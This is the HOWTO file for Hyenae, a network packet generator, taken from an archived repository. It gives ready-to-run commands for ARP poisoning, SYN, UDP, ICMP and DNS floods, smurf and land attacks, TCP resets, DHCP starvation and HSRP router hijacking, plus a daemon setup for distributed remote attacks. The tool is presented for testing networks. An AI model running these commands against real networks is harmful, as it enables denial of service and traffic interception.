This repository has been archived by the owner on Jun 24, 2020. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathHOWTO
executable file
·348 lines (248 loc) · 12.8 KB
/
HOWTO
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
--------------------------------------------------------------------------------
Hyenae Howto
--------------------------------------------------------------------------------
Hyenae
Advanced Network Packet Generator
Copyright (C) 2009 - 2010 Robin Richter
Contact : [email protected]
Homepage : http://sourceforge.net/projects/hyenae/
--------------------------------------------------------------------------------
1. Introduction
The following document is a brief overview of the Hyenae utility suite and its
command line usage. The following paragraphs outline how Hyenae can be used
to reproduce low level ethernet attack scenarios (such as MITM, DoS and DDoS)
to reveal potential security vulnerabilities of your network. Some examples
are enumerated here to illustrate the potential of the Hyenae utility suite.
These concise examples are aimed at users such as network administrators or
analysts, and assume advanced technical knowledge. For a complete overview of
all possible command line arguments, please refer to the README file or the
Manpages.
--------------------------------------------------------------------------------
2. Getting Started
* You will need to install the latest version of Hyenae (See INSTALL)
* You should know how address patterns work (See README or Manpages)
* You should have a strong knowledge of how the ethernet works (See RFC)
--------------------------------------------------------------------------------
3. Determining Available Network Interfaces
Firstly, you will need to select the network interface to operate on. You
can obtain a list of all available network interfaces and the corresponding
interface index, by starting Hyenae with the -l argument. On UNIX-based
operating systems, you will need root privileges to run Hyenae.
# hyenae -l
* Initializing
* Obtaining network interfaces
> 1. en0
> 2. fw0
> 3. en1
> 4. lo0
* Finished: 4 network interfaces found
You may provide the network interface either by name, using -i argument, or by
index, using -I argument. On Windows-based operating systems, you should use
only the interface index to select the network interface.
--------------------------------------------------------------------------------
4. Selecting an Attack Protocol
The next step is to determine the attack protocol you want to use. Choose an
attack protocol based on the kind of attack you want to launch. You can
obtain a list of all available attack protocols by starting Hyenae with the -L
argument.
# hyenae -L
* Initializing
* Obtaining available attacks
> arp-request
> arp-reply
> pppoe-discover
> icmp-echo
> icmp-unreach-tcp
> tcp
> udp
> dns-query
> dhcp-discover
> dhcp-request
> dhcp-release
> hsrp-hello
> hsrp-coup
> hsrp-resign
* Finished: 14 attack protocols available
You can provide the attack protocol by its name (-a). The attack protocols
use different address patterns and in certain cases, may require additional
protocol-dependent arguments. For more information about the required address
pattern format and supplementary arguments of each attack protocol, please
refer to the README file or the Manpages.
--------------------------------------------------------------------------------
5. Attack Examples
Here are a few examples of what you can do with the Hyenae utility suite.
The following attack examples are based on known attack scenarios against a
fictional host. Most of the examples outlined below will be possible only if
the target host is on the same subnet as you are.
5.1 ARP-Request Flood
This example will send an unlimited amount of ARP-Request packets from a
random source to all available machines on the network.
# hyenae -I 3 -a arp-request -s % -d ff:ff:ff:ff:ff:ff \
# -S %-% -D 00:00:00:00:00:00-192.168.0.1
NOTE:
The hardware address strip of the source and the sender address pattern
will be equaly randomized to avoid corrupt packets.
5.2 ARP-Cache Poisoning
This example will send an ARP-Reply packet from a fictional source address
to all available machines on the network.
# hyenae -I 3 -a arp-reply -s 00:f0:21:03:c6:00 -d ff:ff:ff:ff:ff:ff \
# -S 11:22:33:44:55:66-192.168.0.1 -D ff:ff:ff:ff:ff:ff-0.0.0.0 -c 1
5.4 Blind PPPoE Session Initiation Flood
This example sends and inlimited amount of PPPoE-DIscovery packets with
set PADI flag and an incrementing session id from a random source address to
all available machines on the network.
# hyenae -I 3 -a pppoe-discover -o padi -s % -d ff:ff:ff:ff:ff:ff
5.5 Blind PPPoE Session Termination
This example sends and inlimited amount of PPPoE-DIscovery packets with
set PADT flag and an incrementing session id from an existing source adress
to an existing destination address.
# hyenae -I 3 -a pppoe-discover -o padt -s 11:22:33:44:55:66 \
# -d 44:55:66:77:88:99 -q 1 -Q 1
5.6 ICMP-Echo Flood
This example will send a random amount of ICMP-Echo packets between 1 and
10000 from a random source to a fictional target.
# hyenae -I 3 -a icmp-echo -s %-% -d 00:f0:21:03:c6:00-192.168.0.1 \
# -c 1 -C 10000
5.7 ICMP-Smurf Attack
This example will send an unlimited amount of ICMP-Echo packets from an
existing source address against a network broadcast address.
# hyenae -I 3 -a icmp-echo -s 00:f0:21:03:c6:00-192.168.0.1 \
# -d ff:ff:ff:ff:ff:ff-255.255.255.255
5.8 ICMP Based TCP-Connection Reset
This example will send a single ICMP "Destination Unreachable" packet with
the message code "Port unreachable", from a fictional source to a fictional
target. The secondary source and destination patterns are used to set the
source and dstination of the TCP packet that is attached at the end of the
ICMP packet.
# hyenae -I 3 -a icmp-unreach-tcp -o port \
# -s 00:c0:33:d4:03:06-192.168.0.2 \
# -d 00:f0:21:03:c6:00-192.168.0.1 \
# -S 00:c0:33:d4:03:06-192.168.0.2@1093 \
# -D 00:f0:21:03:c6:00-192.168.0.1@21 \
# -C 1
5.9 TCP-SYN Attack
This example will send an unlimited amount of TCP packets with set SYN flag,
from a random source to a fictional target, with a random send delay between
1 and 1000 milliseconds.
# hyenae -I 3 -a tcp -f s -s %-%@%%%% -d 00:f0:21:03:c6:00-192.168.0.1@21 \
# -e 1 -E 1000
5.10 TCP-Land Attack
This example will send a single TCP packet with set SYN flag and an
identical source and destination address.
# hyenae -I 3 -a tcp -f s -s 00:f0:21:03:c6:00-192.168.0.1@139 \
# -d -d 00:f0:21:03:c6:00-192.168.0.1@139 -c 1
5.11 Blind TCP-Connection Reset
This example will send an unlimited amount of TCP packets with set RST
flag, from a fictional random source to a fictional target, with an
incrementing TCP sequence number.
# hyenae -I 3 -a tcp -f r -s 00:c0:33:d4:03:06-192.168.0.2@1093 \
# -d 00:f0:21:03:c6:00-192.168.0.1@21 -q 1 -Q 1
5.12 UDP-Flood
This example will send an unlimited amount of UDP packets with a random
payload of 100 Byte, from a fictional random source to a fictional target.
# hyenae -I 3 -a udp -s %-%@%%%% -d 00:f0:21:03:c6:00-192.168.0.1@130 -p 100
5.13 DNS-Query flood
This example will send an unlimited amount of DNS query packets from a
random source to an existing DNS server.
# hyenae -I 3 -a dns-query -s %-% -d 00:f0:21:03:c6:00-192.168.0.1 \
# -y www.google.com
5.14 DHCP-Discover Flood
This example will send an unlimited amount of DHCP-Discover packets from a
random source to all available machines on the network. The second example
shows the same attack with activated "Requested IP-Address" option.
# hyenae -I 3 -a dhcp-discover -s %-0.0.0.0 \
# -d ff:ff:ff:ff:ff:ff-255.255.255.255
# hyenae -I 3 -a dhcp-discover -s %-0.0.0.0 \
# -d ff:ff:ff:ff:ff:ff-255.255.255.255 -S 192.168.%.%%
5.15 DHCP-Starvation Attack
This example will send an unlimited amount of DHCP-Request packets from a
random source to all available machines on the network. The DHCP-Option
"Server Identifier" is set to the IP-Address of the destination DHCP-Server.
The second example shows the same attack with activated "Requested
IP-Address" option.
# hyenae -I 3 -a dhcp-request -s %-0.0.0.0 \
# -d ff:ff:ff:ff:ff:ff-255.255.255.255 -D 192.168.0.1
# hyenae -I 3 -a dhcp-request -s %-0.0.0.0 \
# -d ff:ff:ff:ff:ff:ff-255.255.255.255 -S % -D 192.168.0.1
5.16 DHCP-Release Forcing
This example will send a single DHCP-Release packet from a fictional source
address to a fictional DHCP-Server. The DHCP-Option "Server Identifier" is
set to the IP-Address of the destination DHCP-Server.
# hyenae -I 3 -a dhcp-release -s 11:22:33:44:55:66-192.168.0.2 \
# -d 44:55:66:77:88:99-192.168.0.1 -D 192.168.0.1 -c 1
5.17 Cisco HSRP Active Router Hijacking
This example will send an unlimited amount of HSRP-Hello packets with set
'active' state and default authentification from a fictional source address to
the HSRP multicast address in an interval of 3 seconds. The virtual
IP-Address in this example is 172.16.40.1, the priority 1 (highest) and the
group number is 172.
# hyenae -I 3 -a hsrp-hello -o active -s 11:22:33:44:55:66-192.168.0.2 \
# -d 172.16.40.1 -z 1 -g 172 -e 3000
--------------------------------------------------------------------------------
6. Starting the attack assistant
Since Hyenaes range of arguments makes it a very powerfull tool to experienced
network specialists and administrators, it can be way to complex for
unexperienced users. In order to provide an easy way to set up attack
scenarios without having deeper knowledge of the attack procedural itself,
Hyenae features a text based attack assistant that will guide unexperienced
users through the setup of common attack scenarios. You can activate the
attack assistant by simply starting Hyenae without any argument.
# hyenae
* Initializing
* Starting attack assistant
Select operation mode:
> 1. Local
> 2. Remote (Single Daemon)
> 3. Remote (Multiple Daemons)
Enter option [1-3]:
...
--------------------------------------------------------------------------------
7. Setting Up the Hyenae Daemon
Hyenae comes with a daemon for setting up remote attacks. The daemon can be
started with just a few arguments. The only required arguments are the network
interface to start incoming remote attack requests from, and either a packet
count or a duration limit. For a list of all available daemon options, please
see the README file or the Manpages.
# hyenaed -I 3 -u 10000
* Initializing
* Starting daemon
* Opening network interface (en1)
* Opening log file (/var/log/hyenaed.log)
* Binding server to *@666
* Hyenae Daemon v0.36-1: Online
If the port argument is unspecified, the daemon will listen on port 666 by
default. Alternatively, you can specify the port to listen on with the -p
argument.
By default the Hyenae daemon will bind it's server socket to any capable
network interfaces of your machine. If you want to make the daemon available
on a specific network interface only, you have to specify the IP-Address of
the network interface you want to bind it to instead by using the -a argument.
# hyenaed -I 3 -a 192.168.0.2 -u 10000
* Initializing
* Starting daemon
* Opening network interface (en1)
* Opening log file (/var/log/hyenaed.log)
* Binding server to 192.168.0.2@666
* Hyenae Daemon v0.36-1: Online
--------------------------------------------------------------------------------
8. Starting a Remote Attack
Starting a remote attack is similar to starting a local one. However, instead
of defining a network interface to operate on, you will need to specify the
remote daemon(s) you want to launch the attack from. You can specify either
a single remote attack daemon to attack from (-r), or multiple ones by passing
a file containing the list of remote daemon addresses (-R). On UNIX-based
operating systems you will need root privileges to run the Hyenae daemon.
# hyenae -r 127.0.0.1@666 -a icmp-echo -s %-%@% -d %-%@%
* Initializing
* Launching remote attack
* Acquiring daemon on 127.0.0.1@666
* Sending remote attack requests
* Receiving remote attack results
* Waiting for 127.0.0.1
> No errors
> Finished: 96950 packets sent (4071900 bytes) in 10.0 seconds
* Finished: 96950 packets sent (4071900 bytes) in 10.2 seconds
Note that unless you specify an attack limitation (a packet count and/or an
attack duration), the maximum packet count and/or attack duration limit of the
remote daemon will be used.
--------------------------------------------------------------------------------